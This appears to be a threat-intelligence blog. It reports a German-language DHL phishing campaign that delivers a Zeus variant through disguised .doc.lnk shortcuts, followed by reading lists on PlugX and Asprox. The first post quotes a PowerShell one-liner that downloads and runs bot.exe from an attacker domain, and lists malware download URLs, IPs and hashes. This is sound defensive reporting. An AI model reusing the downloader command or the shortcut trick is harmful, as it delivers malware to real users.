DHL themed Zeus campaign is using Powershell as malware downloader

Hello,
I have spotted DHL themed phishing campaign using Powershell as malware downloader. Here are some samples of the malicious downloader attachment from the phishing email:

https://malwr.com/analysis/YTlhOGRmNTNlYzQzNGIzNTg0ZTZiOTFkNDg1OGI1Nzc/
https://malwr.com/analysis/ZmU0MjliNzNhYmRlNDE1YmE4ZGQ3NWIyNzAxMzQzNzE/

Attachment has extension *.doc.zip file (to pretend to look like zippeddocument) and inside there is *.doc.lnk.
Instead of the MS office document there is windows shortcut (.lnk), but normal users will most probably see only ".doc", because the common setting on windows is to hide extension of known file types. Link file points to powershell binary and has download script as commandline parameter.

Powershell donwloader example:
(New-Object System.Net.WebClient).DownloadFile('hxxp://nov01mail.pw/bot.exe','%temp%\l.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\l.exe');!%SystemRoot%\system32\SHELL32.dll

The phishing email targets on german speaking victims. Sample email here:
http://www.trojaner-board.de/172090-gefaelschte-dhl-email-schaedliche-infektion.html
http://www.netzwelt.de/news/155327-vorsicht-dhl-virus-neue-spam-welle-trojaner-anhang.html
http://phishing-mails.blogspot.co.uk/2015/10/dhl-paket-angekommen.html
http://blog.botfrei.de/2015/10/erneute-dhl-spamwelle-erreicht-unsere-rechner/



These IPs seems to be serving as the download sites for the malware(or were at some point in time):
5.1.75.148
64.110.131.48
107.161.27.133
162.221.176.38
172.98.211.5
172.245.59.194
192.95.11.146
192.227.244.6
198.98.101.159
198.175.126.100
216.45.55.231

Download sites:
hxxp://2610goodvin.pw/bot.exe
hxxp://2710goodvin.pw/bot.exe
hxxp://cash777.pw/bot.exe
hxxp://casher777soft.pw/bot.exe
hxxp://cyberdrive77787.pw/bot.exe
hxxp://goodprice27.pw/bot.exe
hxxp://goodprice28.pw/bot.exe
hxxp://goodvin77787.in/bot.exe
hxxp://jinsuperstarberlin.pw/bot.exe
hxxp://mamba7777.pw/bot.exe
hxxp://masterb.in/bot.exe
hxxp://masterdj.pw/bot.exe
hxxp://masterhost2777.pw/bot.exe
hxxp://masterjin777.pw/bot.exe
hxxp://masterl188.pw/bot.exe
hxxp://masterlin188.pw/bot.exe
hxxp://masterlin288.pw/bot.exe
hxxp://masterlin788.pw/bot.exe
hxxp://megamail777.pw/bot.exe
hxxp://mis2018.pw/bot.exe
hxxp://mrsoft777.pw/bot.exe
hxxp://nov01mail.pw/bot.exe
hxxp://nov15mailmarketing.in/bot.exe
hxxp://nov19mailmarketing.pw/bot.exe
hxxp://supermoney.pw/bot.exe
hxxp://supersoftware777.pw/bot.exe
hxxp://superstar7747.pw/bot.exe
hxxp://superstar7747.pw/cc.exe
hxxp://supportsoft777.pw/bot.exe
hxxp://verygoodwin7.pw/bot.exe

Some Samples - unfortunately the malware detection from AV vendors is quite unconclusive on the malware family, but according to abuse.ch it is some moddified version of Zeus so hopefully these will get tracked by ZeusTracker.abuse.ch at some point:
62c02f0bb1145d3928b1df7493476f88
9abcd77b3d4c487c59c88511dcf8a719
8375e892e2c447ffe3e55cb818f68de0
d62a8b934836b58f25f047620f269bc7
62c02f0bb1145d3928b1df7493476f88
09b9b83f37998713ae972a2fc6e45e2f
7dd81b268585c596ed83a38f696a7d4f
4f9e35c56b87b516b587c64da33f2012
581eb87538fd2b65f2ba19f30e2f64ba
363ff98bc76668092eb5b00e55e1a9d3

I was able to obtain these 3 samples and run it through malwr.com
ccb86eccbde7683410910adf09bc0a62
        from hxxp://masterlin788[.]pw/bot.exe
        https://malwr.com/analysis/ZjhiMmVkZjI3NGU3NGM1MGFlNzVjZDY0M2Y0NzcxMjI/
        https://www.hybrid-analysis.com/sample/f8ab572c3a395812147faed7fef2c688c0c2b3d06c0074ade741ad4d51fd870c/?environmentId=1

d0c2e2a48459ea52cc0e42e15c995ee2
        from hxxp://nov19mailmarketing[.]pw/bot.exe
        https://malwr.com/analysis/YWNjYWY1NDk5MjAxNGNjYWFiMDEwNTRhNzNmODY0NTk/
        https://www.hybrid-analysis.com/sample/6bbb45a9784a0b83f077d6a9d4a7e89d07ddd79a9f8b5d605aad3ab0855d9655?environmentId=1

1a482869a04f9bfe1a557ec391f5df57
        from hxxp://supportsoft777[.]pw/bot.exe
        https://malwr.com/analysis/YWY3NTZlYjg1NzJjNGFmYjliNDU2NmFhNDBmNjFhYjc/
       

PlugX Chronicles

This blog-post is to compile list of articles and information bits about the PlugX - malware used as a RAT by several APT groups.

PlugX Tracker - http://ptrack.h3x.eu
PlugX Unsorted Corpus (not categorized samples) http://ptrack.h3x.eu/corpus/297
PlugX Corpus of Setup files (usually RAR SFX) http://ptrack.h3x.eu/corpus/290
PlugX Corpus of EXE (usually signed goodware) http://ptrack.h3x.eu/corpus/291
PlugX Corpus of DLL (malicious stub to load the encrypted payload) http://ptrack.h3x.eu/corpus/292
PlugX Corpus of ENC (encrypted payload) http://ptrack.h3x.eu/corpus/293
PlugX Corpus of DOC (phish documents with embedded PlugX) http://ptrack.h3x.eu/corpus/295

Materials on the topic:

• 2015-11-24 - PaloAltoNetworks - Attack Campaign on the Government of Thailand Delivers Bookworm Trojan
• 2015-11-06 - Volatility Labs - PlugX: Memory Forensics Lifecycle with Volatility - announcement
• 2015-10-29 - Michael Ligh / Volatility Labs - PlugX: The Memory Forensics Lifecycle - presentation
• 2015-10-16 - Citizenlab - Targeted Malware Attacks against NGO Linked to Attacks on Burmese Government Websites
• 2015-10-15 - Charles Rami / Proofpoint - Le cheval de Troie PlugX à l’assaut de l’armée et des télécommunications en Russie
• 2015-10-08 - Sarah Silvestriadis / Wapack Labs - PlugX malware is highly customizable for hackers to pick up – bad news for confidential data
• 2015-09-15 - In Pursuit of Optical Fibers and Troop Intel: Targeted Attack Distributes PlugX in Russia
• 2015-09-13 - Christian - Using threat_note To Track Campaigns: Returning to PIVY and PlugX Infrastructure
• 2015-09-08 - Fabien Perigaud - Volatility plugin for PlugX updated
• 2015-09-04 - Threat Research Team Goes “Beyond the Exploit” in Search of Payloads from MS15-093
• 2015-08-20 - ASERT Threat Intelligence Report 2015-05 PlugX Threat Activity in Myanmar
• 2015-08-19 - Symantec - New Internet Explorer zero-day exploited in Hong Kong attack
• 2015-08-19 - Sara Peters - IE Bug Exploited In Wild After Microsoft Releases Out-Of-Band Patch
• 2015-08-19 - Andra Zaharia - Security Alert: Millions Exposed to Cyber Attacks Because of Internet Explorer Vulnerability
• 2015-08-08 - Christian: Poison Ivy and Links to an Extended PlugX Campaign
• 2015-08-06 - Fabien Perigaud/Airbus - Latest changes in PlugX
• 2015-08-05 - Dell - Threat Group-3390 Targets Organizations for Cyberespionage
• 2015-08-03 - Jason Jones / Arbor - Automating Intelligence: Discovering Recent PlugX Campaigns Programmatically
• 2015-07-30 - Sudeep Singh, Kenneth Hsu / FireEye - CVE-2015-0097 Exploited in the Wild
• 2015-07-28 - FBI Flash - Alert Number A-000063-MW - Plugx
• 2015-06-?? - Paul Shomo - The OPM Hack: I Smell a RAT
• 2015-06-18 - Ellen Nakashima / The Washington Post - Chinese had access to U.S. security clearance data (OPM) for one year
• 2015-04-24 - Roddell Santos / TrendMicro - New Wave of PlugX Targets Legitimate Apps
• 2015-02-15 - Gabor Szappanos / Sophos - plugx-goes-to-the-registry-and-india.pdf
• 2015-02-15 - John Zorabedian / Sophos - research uncovers new developments in PlugX APT malware
• 2015-01-29 - Shusei Tomonaga / JPCERT - Analysis of a Recent PlugX Variant - “P2P PlugX”
• 2014-11-12 - Robert Lipovsky / Korplug military targeted attacks: Afghanistan & Tajikistan
• 2014-10-30 - Gabor Szappanos / Sophos - sophos-rotten-tomato-campaign.pdf
• 2014-10-30 - John Zorabedian / Sophos - The Rotten Tomato Campaign: New SophosLabs research on APTs
• 2014-09-01 - Brandon Dixon - Plugx Development Testing
• 2014-09-01 - @9bplus - Watching Attackers Through Virustotal
• 2014-08-14 - Ned Moran, Joshua Homan, Mike Scott / FireEye - Operation Poisoned Hurricane
• 2014-07-24 - Geok Meng Ong, Chong Rong Hwa / FireEye - Pacific Ring of Fire: PlugX / Kaba
• 2014-07-02 - John Zorabedian / Sophos - The next generation of the PlugX APT – new SophosLabs research
• 2014-06-30 - Gabor Szappanos / Sophos - plugx-thenextgeneration.pdf
• 2014-06-30 - Gabor Szappanos / Sophos - PlugX - the next generation
• 2014-03-31 - Takahiro Haruyama - I Know You Want Me - Unplugging PlugX
• 2014-03-27 - Takahiro Haruyama/CCI - ID/IDAPython scripts extracting PlugX configs
• 2014-03-12 - Takahiro Haruyama - PlugX Builder/Controller (Type III, 0x840)
• 2014-01-29 - Fabien Perigaud / Airbus - PlugX "v2": meet "SController"
• 2014-01-06 - Fabien Perigaud / Airbus - PlugX: some uncovered points
• 2013-12-17 - Roman Vasilenko, Kyle Creyts / Lastline - An Analysis of PlugX Malware
• 2013-12-05 - John Zorabedian / Sophos - SophosLabs researchers dissect PlugX Trojan targeting users in Japan
• 2013-11-12 - Nart Villeneuve, Mike Scott / FireEye - Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906
• 2013-05-14 - FireEye - Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick
• 2013-03-26 - Kevin O’Reilly /Contextis - PlugX_-_Payload_Extraction_March_2013_1.pdf
• 2012-11-27 - Dmitry Tarakanov / Kaspersky Securelist - PlugX is Becoming Mature
• 2012-09-17 - Abraham Camba / TrendMicro - Unplugging PlugX Capabilities
• 2012-09-13 - AlienVault - Tracking Down the Author of the PlugX RAT
• 2012-09-10 - Roland Dela Paz / TrendMicro - PlugX: New Tool For a Not So New Campaign

Asprox botnet chronicles

This blog-post is to compile list of articles and information bits about the Asprox botnet.
Asprox malware is being spread around with phishing emails claiming to be from DHL/Fedex/USPS/American Airlines/Costco/Walmart/Pizza Hut/Home Depot/Target and many others as well. It also likes to claim it is court order, funeral/wedding announcement or missed voicemail from WhatsApp.

Asprox C2 Tracker - http://atrack.h3x.eu
Asprox Corpus of EXE (downloader) http://atrack.h3x.eu/corpus/2
Asprox Corpus of ZIP (downloader) http://atrack.h3x.eu/corpus/6
Asprox Corpus of EXE (2nd stage/update) http://atrack.h3x.eu/corpus/5
Asprox Corpus of TXT (displayed message) http://atrack.h3x.eu/corpus/7
Asprox Corpus of DLL modules http://atrack.h3x.eu/corpus/8

Materials on the topic:

• 2015-03-09 - Brad Duncan - What Happened to You, Asprox Botnet?
• 2015-02-25 - TechHelpList - former Asprox intfrastructure used for drug advertising
• 2015-02-04 - TechHelpList - former Asprox intfrastructure used for porn advertising
• 2015-01-02 - Malware-Traffic-Analysis - Fake Target phishing emails from the Asprox botnet
• 2014-12-29 - TechHelpList - Parking Violation Notice - Asprox Malware
• 2014-12-17 - TechHelpList - Details of your order from Best Buy - Asprox Malware
• 2014-12-16 - TechHelpList - Order Confirmation - Walgreens - Asprox Malware
• 2014-12-15 - PaloAlto - Kulouz, Asprox malware family accounts for 80% of attacks
• 2014-12-13 - Softpedia - Facebook Password Change Email Leads to Asprox Malware
• 2014-12-11 - TechHelpList - Facebook password change - Asprox Malware
• 2014-12-11 - The Register - Elderly zombie Asprox botnet STILL mauling biz bods, says survey
• 2014-12-11 - Malware-Traffic-Analysis - Asprox botnet phishing campaign - Subject: Facebook password change
• 2014-12-03 - Gary Warner - ASProx malware threat targets holiday shoppers
• 2014-12-03 - Brian Krebs - Be Wary of ‘Order Confirmation’ Emails
• 2014-11-27 - TechHelpList - Thank you for buying / Order Confirmation / Multiple - Asprox Malware
• 2014-11-20 - Damballa - Partners in Cyber Crime: Following an Advanced Malware Infection Chain
• 2014-11-20 - Damballa - Behind_Malware_Infection_Chain_Rerdom research paper
• 2014-11-12 - Malware-Traffic-Analysis.net - Asprox botnet fake Starbucks phishing emails - delivered Sirius Win 7 Antivirus 2014
• 2014-11-07 - PaloAlto - Kuluoz Trends – October 2014
• 2014-10-29 - Malware-Traffic-Analysis.net - Asprox botnet serving Starbucks coffee
• 2014-10-28 - Malware-Traffic-Analysis.net - Asprox botnet serving free pizza
• 2014-10-08 - TechHelpList - Enjoy your Starbucks Card eGift - Asprox Malware
• 2014-10-02 - TechHelpList - LINE - You have a voice message - Asprox Malware
• 2014-09-11 - Malware-Traffic-Analysis.net - Asprox botnet phishing campaign - DPD - Subject: Home Delivery Notification
• 2014-09-09 - Malware-Traffic-Analysis.net - Apsrox botnet phishing emails - Delta Airlines
• 2014-09-05 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - FedEx - Subject: Postal Notification
• 2014-08-29 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - Subject: Notice of court attendance
• 2014-08-28 - Nick - How Asprox Malware Became an APT in 4 Phases
• 2014-08-18 - Malware-Traffic-Analysis.net - Asprox botnet phishing email - Subject: Payment for driving on a toll road
• 2014-08-06 - Symantec - Asprox URLViewer delivers porn adverts
• 2014-08-04 - Kimberly - Asprox Update - Version 2050
• 2014-07-28 - Long Tran (Fortinet) - Changes in the Asprox Botnet
• 2014-07-22 - Malware-Traffic-Analysis.net - Asprox botnet fake E-ZPass phishing emails
• 2014-07-10 - Malware-Traffic-Analysis.net - Asprox botnet fake court case phishing emails
• 2014-07-09 - Malware-Traffic-Analysis.net - Asprox botnet fake funeral announcement phishing emails
• 2014-07-08 - Malware-Traffic-Analysis.net - Asprox botnet fake E-ZPASS phishing emails
• 2014-06-17 - Kevin Ross - Suricate IDS signature for Asprox traffic
• 2014-06-16 - FireEye - A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware
• 2014-05-15 - Kimberly - A Journey Inside the Asprox Modules
• 2014-03-17 - Frank Jas - New variant of Kuluoz discovered
• 2014-02-28 - Kimberly - Urgent eviction notification - A deeper dive into the Asprox Ecosystem
• 2014-02-12 - TechHelpList - Your application received - Asprox Malware
• 2014-02-06 - TechHelpList - Asprox botnet advertising fraud - general overview 1
• 2014-01-30 - Kimberly - Eubank Funeral Home themed emails lead to Asprox
• 2014-01-30 - Brad - Asprox Emails and Malware
• 2014-01-11 - Kimberly - PG&E Energy Statement themed emails lead to Asprox
• 2014-01-15 - TechHelpList - Death Notification - Asprox Malware
• 2014-01-07 - TechHelpList - Delivery Canceling - Energy Statement - Malware
• 2014-01-07 - Kimberly - Best Buy themed emails lead to Asprox
• 2014-01-06 - TechHelpList - Asprox botnet trojan run - advertising fraud 1
• 2014-01-04 - Herrcore - Inside The New Asprox/Kuluoz
• 2014-01-05 - Kimberly - Atmos Energy Bill themed emails lead to Asprox
• 2013-12-30 - Kimberly - The Asprox botnet wants you to appear in Court
• 2014-12-26 - Kimberly - Costco themed emails lead to Asprox
• 2013-12-26 - Peter Kruse - Asprox er tilbage (Adobe License)
• 2013-12-26 - Gary Warner - Holiday Delivery Failures lead to Kuluoz malware
• 2013-12-26 - TechHelpList - Scheduled Home Delivery Problem - Asprox Malware
• 2013-12-23 - TechHelpList - Hearing of your case in Court NR#... - Virus
• 2013-12-23 - Conrad Longmore - "Hearing of your case in Court NR#6976" spam
• 2013-12-23 - Daniel Wesemann - Costco, BestBuy, Walmart really want to send you a package!
• 2013-12-23 - TechHelpList - Hearing of your case in Court NR#... - Virus
• 2013-12-22 - TechHelpList - Asprox botnet trojan run - malware spamming 1
• 2013-12-20 - TechHelpList - Please look my CV - Virus
• 2013-12-14 - Johannes B. Ullrich - WhatsApp Malware Spam uses Geolocation to Mass Customize Filename
• 2013-12-06 - TechHelpList - You can download your ticket #... - Virus
• 2013-11-28 - Kimberly - Fake WhatsApp Voice Mail Notification invites Asprox and friends - Kimberly spotted that downloads are using geoip location to custmize filename
• 2013-11-13 - Kimberly - Analysis of Asprox and its New Encryption Scheme
• 2013-11-12 - TechHelpList - New Voicemail Notification - WhatsApp - Malware
• 2013-10-18 - TechHelpList - Wedding Invitation - Malware
• 2013-09-20 - Gary Warner - Fake AV Malware Hits the Android
• 2013-08-15 - Shaked Bar - Kuluoz: Malware and botnet analysis
• 2013-07-07 - #MalwareMustDie! In war with Kuluoz network../2/3
• 2013-06-05 - TechHelpList - Fake Fedex Item Forbidden - Virus
• 2013-06-04 - TechHelpList - Your Parcel Has Been Send - Virus
• 2013-05-01 - RebSnippets - Asprox Botnet 2013 - Phishing Malware As a Service
• 2013-04-22 TechHelpList - Your Order - Fake DHL Malware
• 2013-03-04 - Trendmicro - Asprox Reborn blog
• 2013-02-28 - Trendmicro - Asprox Reborn research paper
• 2013-02-01 - Trendmicro - Asprox Botnet Reemerges in the Form of KULUOZ
• 2013-02-01 - Trendmicro - BKDR_KULUOZ – At a Spam Near You
• 2012-10-09 - HertSec - Investigating UPS Phishing Emails
• 2012-12-12 - Kent Backman - Another familiar phish, yet more ransomware controller proxies
• 2012-09-25 - Kent Backman - New Asprox phish, a few old and many more controller proxies
• 2012-09-21 - Miroslav Stampar - Analysis of mass SQL injection attacks(old scheme)
• 2012-09-15 - Kent Backman - Click here for your Asprox package
• 2012-08-30 - Christopher J. Marcinko - No, USPS Did Not Fail to Deliver a Package This Week
• 2012-01-14 - Ken Johnson - FakeAVLock - FedEx Shipping Issues - Revisited
• 2010-06-25 - ITNews - Asprox botnet causing serious concern
• 2009-10-05 - Gunter Ollmann - Asprox Rearing its SQL Injection Head Again
• 2009-02-10 - Greg Martin - ASPROX Back with a vengance
• 2008-09-29 - SANS - ASPROX mutant
• 2008-08-04 - Greg Martin - ASPROX Latest Attack Vector: JS.JS
• 2008-07-?? - SANS - Cleanup in isle 3 please. Asprox lying around
• 2008-07-23 - Greg Martin - ASPROX SQL Injection Botnet and iFrame/Malware
• 2008-07-07 - Greg Martin - ASPROX Payload Morphed NGG.JS
• 2008-06-30 - SANS Robert Danford - More SQL Injection with Fast Flux hosting
• 2008-06-26 - Gerg Martin - ASPROX SQL Injection Attacks cont.
• 2008-06-23 - Greg Martin - ASPROX SQL Injection Botnet and iFrame/Malware
• 2008-06-13 - SANS Johannes Ulrich - SQL Injection: More of the same
• 2008-01-09 - SANS Bojan Zdrnja - Mass exploits with SQL Injection